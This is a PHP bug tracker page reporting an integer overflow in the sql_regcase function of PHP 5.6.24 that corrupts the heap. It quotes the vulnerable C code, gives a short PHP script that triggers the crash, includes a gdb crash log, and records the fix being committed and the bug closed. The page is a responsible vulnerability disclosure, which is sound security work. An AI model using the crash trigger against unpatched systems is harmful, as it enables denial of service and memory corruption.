php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #72838 Integer overflow lead to heap corruption in sql_regcase
Submitted: 2016-08-15 07:22 UTC Modified: 2017-02-13 01:45 UTC
From: minhrau dot vc dot 365 at gmail dot com Assigned: stas
Status: Closed Package: *General Issues
PHP Version: 5.6.24 OS: ALL
Private report: No CVE-ID:
 [2016-08-15 07:22 UTC] minhrau dot vc dot 365 at gmail dot com
Description:
------------
An integer overflow in sql_regcase function will lead to heap corruption. Please see comment about this vulnerability below:

PHP_EREG_API PHP_FUNCTION(sql_regcase)
{
	char *string, *tmp;
	int string_len;
	unsigned char c;
	register int i, j;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &string, &string_len) == FAILURE) {
		return;
	}
	
	tmp = safe_emalloc(string_len, 4, 1); //if string_len = INT_MAX + 1, the size supply to safe_emalloc will be 1
// It'll lead to the heap corruption in the loop below. Please check the crash log for more detail.
	
	for (i = j = 0; i < string_len; i++) {
		c = (unsigned char) string[i];
		if (isalpha(c)) {
			tmp[j++] = '[';
			tmp[j++] = toupper(c);
			tmp[j++] = tolower(c);
			tmp[j++] = ']';
		} else {
			tmp[j++] = c;
		}
	}

Test script:
---------------
<?php

ini_set('memory_limit', -1);



$str = str_repeat('x', 0xffffffff/4)."a";

$str1 = sql_regcase($str);

?>


Expected result:
----------------
No crash

Actual result:
--------------
(gdb) b ereg.c:742
Breakpoint 1 at 0x4632e4: file /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c, line 742.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/minhrau/PHP-5.6.24/sapi/cli/php testsql_regcase_negativelength.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Breakpoint 1, zif_sql_regcase (ht=<optimized out>, return_value=0x7ffff7fa2fb0, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c:742
742		tmp = safe_emalloc(string_len, 4, 1);
(gdb) p string_len
$1 = 1073741824
(gdb) p string_len*4+1
$2 = 1
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x000000000046332c in zif_sql_regcase (ht=<optimized out>, return_value=0x7ffff7fa2fb0, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c:747
747				tmp[j++] = '[';
(gdb) bt
#0  0x000000000046332c in zif_sql_regcase (ht=<optimized out>, return_value=0x7ffff7fa2fb0, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c:747
#1  0x00000000007f908d in zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:558
#2  0x0000000000783b4e in execute_ex (execute_data=0x7ffff7f6f260) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:363
#3  0x000000000074ed41 in zend_execute_scripts (type=type@entry=8, retval=retval@entry=0x0, file_count=file_count@entry=3) at /home/minhrau/PHP-5.6.24/Zend/zend.c:1341
#4  0x00000000006ed0d0 in php_execute_script (primary_file=primary_file@entry=0x7fffffffd0e0) at /home/minhrau/PHP-5.6.24/main/main.c:2613
#5  0x00000000007faa97 in do_cli (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:994
#6  0x00000000004361e4 in main (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:1378
(gdb) 


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-08-16 06:50 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-08-16 06:50 UTC] stas@php.net
The fix is in security repo as 165336bfa6c06bb90f5ee4e70fc248e072bbf96c and in https://gist.github.com/ae822865b9f445fed46bde0654046df3

please verify
 [2016-08-16 07:26 UTC] minhrau dot vc dot 365 at gmail dot com
This patch looks good.
 [2016-08-17 05:57 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=5f91f692c354e45b9b46ba672f4182ff478bd1a3
Log: Fix bug #72838 - 	Integer overflow lead to heap corruption in sql_regcase
 [2016-08-17 05:57 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-08-17 08:23 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=5f91f692c354e45b9b46ba672f4182ff478bd1a3
Log: Fix bug #72838 - 	Integer overflow lead to heap corruption in sql_regcase
 [2016-08-17 09:15 UTC] laruence@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=5f91f692c354e45b9b46ba672f4182ff478bd1a3
Log: Fix bug #72838 - 	Integer overflow lead to heap corruption in sql_regcase
 [2016-08-18 11:15 UTC] tyrael@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=6ba48cff6c31094bc1a6233e023c3a2fcd91ab7a
Log: Fix bug #72838 - 	Integer overflow lead to heap corruption in sql_regcase
 [2016-10-17 10:09 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=5f91f692c354e45b9b46ba672f4182ff478bd1a3
Log: Fix bug #72838 - 	Integer overflow lead to heap corruption in sql_regcase
 [2017-02-13 01:45 UTC] stas@php.net
-Type: Security +Type: Bug
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Aug 29 15:01:52 2017 UTC